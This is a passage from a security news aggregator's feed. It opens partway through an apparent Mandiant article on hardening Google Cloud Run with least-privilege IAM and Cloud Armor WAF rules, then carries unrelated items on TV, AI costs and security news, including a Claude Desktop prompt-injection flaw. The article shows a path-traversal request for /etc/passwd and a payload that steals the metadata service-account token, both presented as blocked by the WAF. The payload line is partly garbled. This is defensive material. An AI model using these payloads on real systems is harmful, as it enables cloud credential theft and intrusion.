<div class="block-paragraph_advanced"><p><span>Attackers can then leverage Google Cloud Cloud CLI within the security context of the Cloud Run Compute service account. If deployed without best practices and thoughtful configuration controls, for example, if the  Cloud Run service runs as the default compute service account with Editor permissions, this would be equivalent to a full GCP project takeover, and allow the attacker to:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Read/write/delete most GCP resources</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Deploy new services and modify existing configurations</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Access secrets and encryption keys</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Exfiltrate data across all accessible storage systems</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Establish persistent backdoors through new service accounts or SSH keys.</span></p>
</li>
</ul>
<h3><span>Hardening Recommendations</span></h3>
<p><span>Mandiant recommends that organizations implement parallel approaches for effective serverless security:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Secure Software Development Lifecycle (S-SDLC): </strong><span>integrate security scanning, code review, least-privilege IAM into CI/CD pipelines before deployment and integrate continuous security testing; </span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Vibe Coding</strong><span>: Mandiant recommends multi-layered security enforcement for AI-generated code or "vibe coding." Organizations should isolate AI experimentation within dedicated sandbox environments and enforce strict data egress controls to protect production systems and internal data. Furthermore, development environments should be restricted to approved IDEs with human-in-the-loop capabilities, utilizing only verified plugins operating under least privilege to mitigate supply chain vulnerabilities. Finally, organizations must ensure this AI-generated software follows Secure Software Development Lifecycle (S-SDLC) controls while establishing clear internal guidelines regarding permitted use cases. Comprehensive security fundamentals for vibe coding are documented in detail within the </span><a href="https://www.wiz.io/academy/ai-security/vibe-coding-security" rel="noopener" target="_blank"><span>Wiz Vibe Coding Security Fundamentals blog</span></a><span>.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Compensating Runtime Controls: </strong><span>Implement the following defense-in-depth measures to limit and contain compromise even when application vulnerabilities exist;</span></p>
</li>
</ul>
<h4><span>Segregate Public Services</span></h4>
<p><span>Host public-facing Cloud Run services consumed by untrusted external entities in a dedicated, isolated Google Cloud project. This ensures a compromise does not provide an immediate path to critical internal resources. The implementation of this 'Service Project' model is beyond the scope of this post; however, it is documented in detail within the </span><a href="https://docs.cloud.google.com/architecture/blueprints/serverless-blueprint"><span>secured serverless architecture blueprint</span></a><span>.</span></p>
<h4><span>Identity and Access Management (IAM)</span></h4>
<p><span>Mandiant recommends using a custom service account for service authentication rather than the default Compute Engine service account, following the principle of least privilege. Grant only the specific permissions necessary for the Cloud Run function to operate, for example:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Cloud Storage Bucket Access:</strong><span> If the service only requires read access to objects from a Cloud Storage bucket, grant the </span><code>Storage Object Viewer</code><span> (</span><code>roles/storage.objectViewer</code><span>) role restricted to that specific bucket.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Secret Manager Access:</strong><span>  If the service requires access to secrets, grant the</span><code> Secret Manager Secret Accessor</code><span> (</span><code>roles/secretmanager.secretAccessor</code><span>) role only to the individual secrets required. For further details on secret access from Cloud Run, refer to the </span><a href="https://docs.cloud.google.com/run/docs/configuring/services/secrets#required_roles"><span>GCP documentation on configuring secrets</span></a><span>.</span></p>
</li>
</ul>
<h4><span>Layer 7 Application Load Balancer (ALB) Architecture</span></h4>
<p><span>Restrict ingress traffic for serverless functions to internal only and use an external Layer 7 ALB to manage internet exposure. This provides:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Centralized Traffic Management:</strong><span> Granular control over headers and SSL policies.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Cloud Armor Integration:</strong><span> Web Application Firewall (WAF) support to harden applications against vulnerabilities such as Local/Remote File Inclusion (LFI/RFI) and Server-Side Request Forgery (SSRF).</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Traffic Shaping: </strong><span>Implementation of rate limits and request limitations to prevent abuse.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Enhanced Visibility:</strong><span> Robust logging and log-forwarding capabilities for security monitoring.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Identity-Aware Proxy (IAP):</strong><span> integration support for scenarios requiring specific identity-based authentication for internal users.</span></p>
</li>
</ul>
<h4><span>Web Application Firewall (WAF) <span>—</span> Cloud Armor</span></h4>
<p><a href="https://cloud.google.com/security/products/armor"><span>Cloud Armor</span></a><span> provides WAF protections that can be integrated with the Load Balancer to filter malicious traffic. The following examples demonstrate how to configure Cloud Armor security policies to block the specific local file inclusions, remote code execution and traversal attacks previously outlined.</span></p>
<h4><span>Local File Inclusion</span></h4>
<p><span>The </span><code>lfi-v33-stable</code><span> preconfigured WAF rules can block common local file inclusion attacks (</span><a href="https://docs.cloud.google.com/armor/docs/waf-rules#local_file_inclusion_lfi"><span>local file inclusion reference</span></a><span>).</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>evaluatePreconfiguredWaf('lfi-v33-stable', {'sensitivity': 3})</code></pre>
<p><span><span>Figure 7: Cloud Armor lfi-v33-stable WAF rule configuration</span></span></p></div>
<div class="block-paragraph_advanced"><p><span>Blocking a path traversal request </span><code>../../../etc/passwd</code><span> resulting in a 403 forbidden:</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>curl -X POST https://exampleabc01.com -H "Content-Type: application/json" -d '{"file": "../../../etc/passwd}'
&lt;!doctype html&gt;&lt;meta charset="utf-8"&gt;&lt;meta name=viewport content="width=device-width, initial-scale=1"&gt;&lt;title&gt;403&lt;/title&gt;403 Forbidden</code></pre>
<p><span><span>Figure 8: Verification of Cloud Armor blocking path traversal request, resulting in a 403 forbidden</span></span></p></div>
<div class="block-paragraph_advanced"><h4><span>Remote Code Execution</span></h4>
<p><span>The </span><code>rce-v33-stable</code><span> preconfigured WAF rules can block remote code execution attempts (</span><a href="https://docs.cloud.google.com/armor/docs/waf-rules#remote_code_execution_rce"><span>remote code execution reference</span></a><span>).</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>evaluatePreconfiguredWaf('rce-v33-stable', {'sensitivity': 3})</code></pre>
<p><span><span>Figure 9: Cloud Armor rce-v33-stable WAF rule configuration</span></span></p></div>
<div class="block-paragraph_advanced"><p><span>Blocking the remote code execution request from the previous example results in a 403 forbidden:</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>curl -X POST https://exampleabc01.com -H "Contencurl -X POST https://exampleabc01.com -H "Content-Type: application/json" -d "{\"input\": \"curl 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token' -H 'Metadata-Flavor: Google'\"}"
&lt;!doctype html&gt;&lt;meta charset="utf-8"&gt;&lt;meta name=viewport content="width=device-width, initial-scale=1"&gt;&lt;title&gt;403&lt;/title&gt;403 Forbidden</code></pre>
<p><span><span>Figure 10: Verification of Cloud Armor blocking Remote Code execution, resulting in a 403 forbidden</span></span></p></div>
<div class="block-paragraph_advanced"><h4><span>Serverless Architecture Controls</span></h4>
<p><span>Hardening Cloud Run services is only one part of a secure architecture. Because these services often connect to other Google Cloud resources, a single compromise can expose additional services. Implementing defense-in-depth is critical. Specifically, when using direct VPC egress or VPC Access connectors, use VPC Service Controls to restrict lateral movement and exfiltration through granular access policies.</span></p>
<h4><span>Secure Software Development Lifecycle (S-SDLC)</span></h4>
<p><span>While the previously outlined hardening strategies are critical, the ideal standard remains the proactive identification of vulnerabilities during the initial development stages. A deep dive into "Shift-Left" security is beyond the scope of this analysis, which focuses on mitigating risks within existing code. However, a Secure Software Development Lifecycle (S-SDLC) remains a fundamental principle. Robust code validation and continuous security testing are essential to neutralize threats before serverless functions are published externally.</span></p>
<h4><span>Cloud Run Threat Detection</span></h4>
<p><span>Beyond the hardening recommendations outlined in this post, </span><a href="https://cloud.google.com/security/products/security-command-center"><span>Google Cloud Security Command Center (SCC)</span></a><span> provides built-in services to detect control plane attacks against Cloud Run resources. These include detectors for credential access, reconnaissance, and the execution of scripts or reverse shells. The </span><a href="https://docs.cloud.google.com/security-command-center/docs/cloud-run-threat-detection-overview"><span>Cloud Run Threat Detection</span></a><span> service is available for Premium and Enterprise tiers.</span></p>
<h3><span>Conclusion</span></h3>
<p><span>Serverless applications drive agility and rapid business value. While "vibe-coding" has made it easier than ever to deploy code, this breakneck speed demands that teams integrate security early in the development lifecycle, move beyond default configurations, and prioritize a defense-in-depth strategy centered on identity and architecture. </span></p>
<h3><span>Acknowledgements</span></h3>
<p><span>This analysis would not have been possible without the assistance of Ischa Rijff, Phil Pearce, and Juraj Sucik.</span></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How Silo Season 3 Is Setting Up the Fourth and Final Season]]></title>
<description><![CDATA[Silo Season 3 is already answering some of the show's biggest mysteries, but it is also laying the foundation for the final chapter. With Apple TV confirming that Season 4 will end the adaptation of Hugh Howey's trilogy, the latest episodes are expanding the story beyond Juliette's survival and r...]]></description>
<link>https://tsecurity.de/de/3670831/ios-mac-os/how-silo-season-3-is-setting-up-the-fourth-and-final-season/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670831/ios-mac-os/how-silo-season-3-is-setting-up-the-fourth-and-final-season/</guid>
<pubDate>Wed, 15 Jul 2026 15:40:29 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Silo Season 3 is already answering some of the show's biggest mysteries, but it is also laying the foundation for the final chapter. With Apple TV confirming that Season 4 will end the adaptation of Hugh Howey's trilogy, the latest episodes are expanding the story beyond Juliette's survival and revealing how the silos came to exist in the first place.



Silo Season 3 at a glance




Release date: July 3, 2026



Episodes: 10



Release schedule: One new episode every Friday through September 4, 2026



Genre: Sci-fi, mystery, dystopian drama



Streaming on: Apple TV



Main cast: Rebecca Ferguson, Common, Harriet Walter, Chinaza Uche, Avi Nash, Ashley Zukerman, Jessica Henwick, Colin Hanks, Alexandria Riley



Created by: Graham Yost



Based on: Hugh Howey's bestselling Silo book trilogy




Where the story is heading



Spoilers ahead.



Season 3 continues Juliette Nichols' journey after the dramatic events of Season 2. While she faces the consequences of crossing between silos, the series also introduces a second timeline that takes viewers centuries into the past. This new storyline explores the events that led to humanity living underground and slowly uncovers the conspiracy behind the construction of the silos. 



Instead of focusing only on one underground community, the series now connects multiple silos and shows that the mystery is much bigger than anyone originally believed.



Season 3 is building the bridge to the ending



One of the biggest changes this season is its shift toward the prequel story inspired by Hugh Howey's Shift. While earlier seasons mainly followed Juliette's investigation inside Silo 18, Season 3 spends significant time exploring the "Before Times."



New characters such as journalist Helen Drew and Congressman Daniel Keene play a major role in uncovering the political decisions and hidden plans that shaped the future. Their discoveries explain why the silos exist and how the world reached its current state.



These revelations are expected to become the foundation for everything that happens in Season 4.



Multiple timelines are expanding the mystery



Season 3 uses two parallel storylines that slowly move toward each other.



The present-day story follows Juliette as she searches for answers while facing new dangers across different silos.



At the same time, the flashback timeline explains the origins of the underground civilization. Rather than treating these stories separately, each episode reveals information that changes how viewers understand events in the present.



This structure allows the writers to answer long-running questions while introducing new twists that can carry into the final season.



Season 4 already has a clear destination



Unlike many television series that wait for renewal decisions, Silo already knows where its story will end.



Apple renewed the show for both Seasons 3 and 4, allowing Graham Yost and the creative team to adapt the complete trilogy without rushing the ending. Season 4 will conclude the story by adapting the final novel, Dust, bringing together the mysteries surrounding the silos, their creators, and humanity's future.



Because of that long-term plan, many of Season 3's new characters, historical events, and world-building moments feel like carefully placed pieces rather than standalone stories.



Why fans should pay attention now



The latest season contains several clues that will likely become important later.



Viewers are learning:




How the silo project first began.



Who was responsible for creating it.



Why different silos developed differently.



How the past directly affects Juliette's future.



Which unanswered mysteries are being saved for the series finale.




Every episode adds another piece to the larger puzzle, making Season 3 one of the most important chapters in the entire series.



Wrap Up



Silo Season 3 does much more than continue Juliette's story. It expands the world, reveals the origins of the silos, and carefully prepares viewers for the confirmed fourth and final season. With two timelines finally coming together and more answers arriving each week, the series is moving steadily toward its planned conclusion.



What do you plan to watch on Apple TV this week? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[DeepSeek will offenbar an die Börse – IPO-Einreichung noch 2026 möglich]]></title>
<description><![CDATA[Nur Wochen nach einer milliardenschweren Finanzierungsrunde soll DeepSeek die nächste Runde und parallel einen Börsengang planen.]]></description>
<link>https://tsecurity.de/de/3670820/it-nachrichten/deepseek-will-offenbar-an-die-boerse-ipo-einreichung-noch-2026-moeglich/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670820/it-nachrichten/deepseek-will-offenbar-an-die-boerse-ipo-einreichung-noch-2026-moeglich/</guid>
<pubDate>Wed, 15 Jul 2026 15:33:04 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Nur Wochen nach einer milliardenschweren Finanzierungsrunde soll DeepSeek die nächste Runde und parallel einen Börsengang planen.]]></content:encoded>
</item>
<item>
<title><![CDATA[LegacyHive: Windows-Privilegieneskalation schon vor dem Patch greifbar]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – Ein neuer Windows-Exploit namens LegacyHive zielt auf die User Profile Service-Komponente (ProfSvc) und ermöglicht das willkürliche Laden von Registry-Hives zur Privilegieneskalation. Der Proof-of-Concept ist laut den Angaben des Forschers unmittelbar nach dem Patch-Tuesday...]]></description>
<link>https://tsecurity.de/de/3670749/it-security-nachrichten/legacyhive-windows-privilegieneskalation-schon-vor-dem-patch-greifbar/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670749/it-security-nachrichten/legacyhive-windows-privilegieneskalation-schon-vor-dem-patch-greifbar/</guid>
<pubDate>Wed, 15 Jul 2026 15:09:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-legacyhive-windows-registry-hive-exploit.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-legacyhive-windows-registry-hive-exploit.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-legacyhive-windows-registry-hive-exploit-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-legacyhive-windows-registry-hive-exploit-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-legacyhive-windows-registry-hive-exploit-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-legacyhive-windows-registry-hive-exploit-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-legacyhive-windows-registry-hive-exploit-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – Ein neuer Windows-Exploit namens LegacyHive zielt auf die User Profile Service-Komponente (ProfSvc) und ermöglicht das willkürliche Laden von Registry-Hives zur Privilegieneskalation. Der Proof-of-Concept ist laut den Angaben des Forschers unmittelbar nach dem Patch-Tuesday-Update verfügbar geworden – und soll auf allen aktuell unterstützten Windows-Desktop- und Serverversionen funktionieren. Parallel dazu häufen sich 2026 […]</p>
<div><a href="https://www.it-boltwise.de/legacyhive-windows-privilegieneskalation-schon-vor-dem-patch-greifbar.html">... den vollständigen Artikel <strong>»LegacyHive: Windows-Privilegieneskalation schon vor dem Patch greifbar«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/legacyhive-windows-privilegieneskalation-schon-vor-dem-patch-greifbar.html">LegacyHive: Windows-Privilegieneskalation schon vor dem Patch greifbar</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[PromptFiction Flaw Auto-Submitted Hidden Prompts in Claude Desktop]]></title>
<description><![CDATA[A one-click Claude Desktop flaw allowed attackers to submit concealed instructions without review, exposing chats and enabling code execution on some systems remotely. This article has been indexed from Hackread – Cybersecurity News, Data Breaches, AI and More Read the…
Read more →
The post Promp...]]></description>
<link>https://tsecurity.de/de/3670685/it-security-nachrichten/promptfiction-flaw-auto-submitted-hidden-prompts-in-claude-desktop/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670685/it-security-nachrichten/promptfiction-flaw-auto-submitted-hidden-prompts-in-claude-desktop/</guid>
<pubDate>Wed, 15 Jul 2026 14:50:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A one-click Claude Desktop flaw allowed attackers to submit concealed instructions without review, exposing chats and enabling code execution on some systems remotely. This article has been indexed from Hackread – Cybersecurity News, Data Breaches, AI and More Read the…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/promptfiction-flaw-auto-submitted-hidden-prompts-in-claude-desktop/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/promptfiction-flaw-auto-submitted-hidden-prompts-in-claude-desktop/">PromptFiction Flaw Auto-Submitted Hidden Prompts in Claude Desktop</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[PromptFiction Flaw Auto-Submitted Hidden Prompts in Claude Desktop]]></title>
<description><![CDATA[A one-click Claude Desktop flaw allowed attackers to submit concealed instructions without review, exposing chats and enabling code execution on some systems remotely.]]></description>
<link>https://tsecurity.de/de/3670660/it-security-nachrichten/promptfiction-flaw-auto-submitted-hidden-prompts-in-claude-desktop/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670660/it-security-nachrichten/promptfiction-flaw-auto-submitted-hidden-prompts-in-claude-desktop/</guid>
<pubDate>Wed, 15 Jul 2026 14:37:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A one-click Claude Desktop flaw allowed attackers to submit concealed instructions without review, exposing chats and enabling code execution on some systems remotely.]]></content:encoded>
</item>
<item>
<title><![CDATA[5 ways for CIOs to avoid AI bill shock]]></title>
<description><![CDATA[Gen AI spending is moving beyond the familiar software model of seats, licenses, and pilots. As AI shifts from copilots to embedded workflows and autonomous agents, one user request can trigger multiple model calls, retrieval steps, retries, orchestration layers, and infrastructure events. A tool...]]></description>
<link>https://tsecurity.de/de/3670246/it-security-nachrichten/5-ways-for-cios-to-avoid-ai-bill-shock/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670246/it-security-nachrichten/5-ways-for-cios-to-avoid-ai-bill-shock/</guid>
<pubDate>Wed, 15 Jul 2026 12:08:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Gen AI spending is moving beyond the familiar software model of seats, licenses, and pilots. As AI shifts from copilots to embedded workflows and autonomous agents, one user request can trigger multiple model calls, retrieval steps, retries, orchestration layers, and infrastructure events. A tool that looks affordable in pilot may behave very differently once connected to production systems or allowed to act with less human supervision.</p>



<p class="wp-block-paragraph">According to Michael Corrigan, CIO of World Insurance Associates, AI introduces a fundamentally different cost model — one that’s usage driven, non-linear, and tightly coupled to business activity. “Success requires shifting from traditional IT budgeting to FinOps-style discipline where consumption, value, and governance are actively managed in real time,” he says.</p>



<p class="wp-block-paragraph">Here are five ways CIOs can build that discipline before AI costs spiral.</p>



<h2 class="wp-block-heading">Forecast AI by workflow, not by user</h2>



<p class="wp-block-paragraph">At World, a top 25 insurance broker with about 3,000 employees across roughly 300 locations, AI use falls into three broad categories, Corrigan says. One is broad tools, such as copilots. Another is embedded AI inside SaaS platforms. And the third is bespoke AI built around specific workflows and manual processes.</p>



<p class="wp-block-paragraph">“The bespoke is the area that’s growing the most right now,” he says. “And that’s where the model, from a cost perspective, has really been shifting from a license seat cost to a token consumption or token burn cost, or even a hybrid.”</p>


<div class="extendedBlock-wrapper block-coreImage left"><figure class="wp-block-image alignleft size-1240-r3:2 is-resized"> width="1240" height="827" sizes="auto, (max-width: 1240px) 100vw, 1240px"&gt;<figcaption class="wp-element-caption"><p>Michael Corrigan, CIO, World Insurance Associates</p>
</figcaption></figure><p class="imageCredit">WIA</p></div>



<p class="wp-block-paragraph">Seat-based pricing is relatively easy to forecast whereas consumption-based AI isn’t. Costs may depend on prompt complexity, output length, model choice, workflow design, and whether the system calls a model once or many times in the background.</p>



<p class="wp-block-paragraph">World tries to manage that uncertainty by defining the business problem, success criteria, and expected operational improvement upfront. Pilots help estimate consumption before scaling, but Corrigan says they don’t remove the ambiguity.</p>



<p class="wp-block-paragraph">“We’ll try our best in the pilot to understand what the consumption rate is, what the token burn rate is,” he says. But once a consumption-based workflow goes into production, he adds, an estimate is put into place. That estimate is informed, but still rough.</p>



<p class="wp-block-paragraph">Elmer Morales, founder and CEO of koder.com, an agentic AI coding startup, says CIOs should think less about headcount and more about <a href="https://www.cio.com/article/4163373/cios-bring-ai-transformation-home-to-it-workflows.html?utm=hybrid_search">workflow mechanics</a>. Agentic AI costs are driven by the number of decisions an agent makes, how often it retrieves external data, how much context it carries, and how many systems it touches.</p>



<p class="wp-block-paragraph">“CIOs should start by mapping workflows, not necessarily users,” he says. “The relevant variable isn’t going to be the headcount but how many decisions an agent makes per task.”</p>



<h2 class="wp-block-heading">Model the failure path, not just the happy path</h2>



<p class="wp-block-paragraph">Pilots can mislead because they often test the cleanest version of an AI workflow. Morales says many enterprises model agentic AI costs around the happy path: the user gives a clear prompt, the system understands the request, the agent completes the task, and the process ends. Production is messier.</p>



<p class="wp-block-paragraph">“They generally don’t model for situations where the agent is going to need to go back and check its work and redo things,” Morales says. “A lot of times, agents are wrong, either because they hallucinate or they understood the problem incorrectly.”</p>



<p class="wp-block-paragraph">In an agentic workflow, the system may check its work, call another tool, retrieve more data, or redo a step. While that may improve quality, it also adds cost.</p>


<div class="extendedBlock-wrapper block-coreImage left"><figure class="wp-block-image alignleft size-1240-r3:2 is-resized"> width="1240" height="827" sizes="auto, (max-width: 1240px) 100vw, 1240px"&gt;<figcaption class="wp-element-caption"><p>Elmer Morales, founder and CEO, koder.com</p>
</figcaption></figure><p class="imageCredit">koder.com</p></div>



<p class="wp-block-paragraph">The difference between copilots and <a href="https://www.cio.com/article/3603856/agentic-ai-promising-use-cases-for-business.html?utm=hybrid_search">agents</a> is central. A copilot interaction is often one prompt and one response. An agentic workflow may involve agents moving through a decision tree, executing tasks in sequence or in parallel, and calling sub-agents or external systems along the way. “By the time it’s achieved the original goal, the agent might have made 50 or 100 model calls, compared with a single call for a traditional copilot prompt,” Morales says.</p>



<p class="wp-block-paragraph">That’s why CIOs should require teams to model the failure path before production, like how many retries are allowed, how much context is resent, which tools can be called, when a human should intervene, and what happens when the agent can’t complete the task.</p>



<h2 class="wp-block-heading">Build cost controls into the architecture</h2>



<p class="wp-block-paragraph">Traditional FinOps practices still matter, but AI requires more than retrospective dashboards and chargebacks.</p>



<p class="wp-block-paragraph">According to Pavan Madduri, senior cloud platform engineer at industrial supply company Graigner, looking backward at usage data, as traditional FinOps often does, can be too late. Costs are shaped by prompt design, model selection, agent behavior, orchestration choices, and runtime loops.</p>



<p class="wp-block-paragraph">“Dashboards or chargebacks, those are historical accounting,” he says. “The money’s already gone.” For AI, he argues, cost controls need to be embedded into the architecture. That includes hard token caps, retry-depth limits, maximum runtime limits, workload prioritization, background-job throttling, and cluster-level controls that prevent runaway consumption.</p>



<p class="wp-block-paragraph">“The real FinOps means you need to have the cost constraints embedded into your architecture framework,” Madduri says.</p>



<p class="wp-block-paragraph">Those controls also extend to infrastructure. Expensive GPUs may sit warm between jobs because systems need capacity available when inference demand arrives. Teams may pass huge schemas, databases, or thousands of lines of code into frontier models when a smaller or more focused prompt would do.</p>


<div class="extendedBlock-wrapper block-coreImage left"><figure class="wp-block-image alignleft size-1240-r3:2 is-resized"> width="1240" height="828" sizes="auto, (max-width: 1240px) 100vw, 1240px"&gt;<figcaption class="wp-element-caption"><p>Pavan Madduri, senior cloud platform engineer, Graigner</p>
</figcaption></figure><p class="imageCredit">Graigner</p></div>



<p class="wp-block-paragraph">Enterprises should also adopt event-driven autoscaling, Madduri says. “Use tools like KEDA to scale GPU nodes down to zero the moment inference demand drops, so teams only pay for the windows when the silicon is actively crunching tokens.”</p>



<p class="wp-block-paragraph">Corrigan says World uses rate limits, spend limits, alerts, and approval gateways for consumption-based tools. When users approach token consumption limits, automated alerts allow IT and the business to review whether the continued spend is justified.</p>



<p class="wp-block-paragraph">“If it’s not meeting the success criteria we expected, you have to have the control in place to say we’re going to move on or kill that process,” Corrigan says.</p>



<h2 class="wp-block-heading">Route work to the right model</h2>



<p class="wp-block-paragraph">CIOs can also reduce <a href="https://www.cio.com/article/4152601/without-controls-an-ai-agent-can-cost-more-than-an-employee.html?utm=hybrid_search">AI bill shock</a> by avoiding a default assumption that every task requires the most powerful model available. While some tasks need advanced reasoning, many others don’t. A simple support ticket, log-parsing task, or structured database transaction may be handled by a smaller or cheaper model. A complex architecture decision, legal analysis, or multi-step reasoning task may justify a more powerful one.</p>



<p class="wp-block-paragraph">“Choosing the right model for the right prompt and right question — that’s where you leverage the maximum from that model, and you can decrease the costing,” Madduri says. “If you default every single call to a frontier model, that’s architectural laziness.”</p>



<p class="wp-block-paragraph">Morales makes a similar point. Not every step in an agentic workflow requires a top-of-the-line model. Model routing, he says, is the discipline of determining the best model for the task, and providing the relevant context when the model needs it.</p>



<p class="wp-block-paragraph">According to Jim Olsen, CTO of enterprise software company ModelOp, CIOs should use the least expensive model that can accomplish the business goal. Using the biggest model for everything is easier, but expensive. “It’s like hiring the most expensive engineer to change a few colors in a website’s CSS, or visual styling,” he says. “You wouldn’t do that. You use the appropriate tools for the task.”</p>



<h2 class="wp-block-heading">Tie consumption to business value</h2>



<p class="wp-block-paragraph">For Olsen, the deeper enterprise problem is AI value shock, not just bill shock. Spending $200,000 in a quarter on AI is justified if it produces $2 million in business value. The problem is spending heavily on use cases that don’t generate a meaningful return.</p>



<p class="wp-block-paragraph">“Are you actually getting that return on investment, or are you just blowing tokens for something that’s not delivering the value to your business?” Olsen asks. Tracking token usage by user or department may show who consumed AI, but not whether the consumption mattered.</p>


<div class="extendedBlock-wrapper block-coreImage left"><figure class="wp-block-image alignleft size-1240-r3:2 is-resized"> width="1240" height="827" sizes="auto, (max-width: 1240px) 100vw, 1240px"&gt;<figcaption class="wp-element-caption"><p>Jim Olsen, CTO, ModelOp</p>
</figcaption></figure><p class="imageCredit">ModelOp</p></div>



<p class="wp-block-paragraph">For most enterprise AI systems, Olsen says costs should be tied back to business use cases. A model may be used for HR document search, customer support, code review, problem resolution, or other functions. Each use case may draw on the same underlying models or agents, but the business value can be very different.</p>



<p class="wp-block-paragraph">That’s why he argues that companies need an AI inventory, a record of which business workflows use which models, agents, providers, workflows, and systems. Without that inventory, enterprises can’t connect consumption to value.</p>



<p class="wp-block-paragraph">Corrigan takes a similar approach from a governance perspective. At World, new AI ideas go through an intake process. Business users propose improvements, and IT, finance, operations, sales, and business stakeholders evaluate, prioritize, and monitor them from pilot through production.</p>



<p class="wp-block-paragraph">That may be where the next stage of AI FinOps is heading, toward a clearer understanding of which AI consumption deserves to scale, not just to lower bills. So the question, as Olsen puts it, isn’t whether someone used a million tokens. It’s what are they using them for.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft Patchday Juli 2026: 2 Zero-Days und Rekord-Patches - Security-Insider]]></title>
<description><![CDATA[Parallel greifen Angreifer CVE-2026-56164 in SharePoint Server an, eine Rechteausweitung mit einem CVSS-Score von 5.3. Der niedrige Wert täuscht, denn ...]]></description>
<link>https://tsecurity.de/de/3670193/windows-server/microsoft-patchday-juli-2026-2-zero-days-und-rekord-patches-security-insider/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670193/windows-server/microsoft-patchday-juli-2026-2-zero-days-und-rekord-patches-security-insider/</guid>
<pubDate>Wed, 15 Jul 2026 11:46:49 +0200</pubDate>
<category>🪟 Windows Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Parallel greifen Angreifer CVE-2026-56164 in SharePoint <b>Server</b> an, eine Rechteausweitung mit einem CVSS-Score von 5.3. Der niedrige Wert täuscht, denn ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Vor 18 Jahren: Höllenmaschine 3 –  gewinnen Sie den 30.000-Euro-PC]]></title>
<description><![CDATA[Hinweis: Dieser Artikel erschien am 3. März 2008 auf pcwelt.de. Anlässlich unseres 20‑jährigen Jubiläums haben wir mittels der Wayback Machine des Internet Archive das zeitgeschichtliche Dokument restauriert. Wir haben alle Hyperlinks im Text belassen – sofern sie noch auf historische Inhalte füh...]]></description>
<link>https://tsecurity.de/de/3670019/it-nachrichten/vor-18-jahren-hoellenmaschine-3-gewinnen-sie-den-30000-euro-pc/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670019/it-nachrichten/vor-18-jahren-hoellenmaschine-3-gewinnen-sie-den-30000-euro-pc/</guid>
<pubDate>Wed, 15 Jul 2026 10:33:32 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



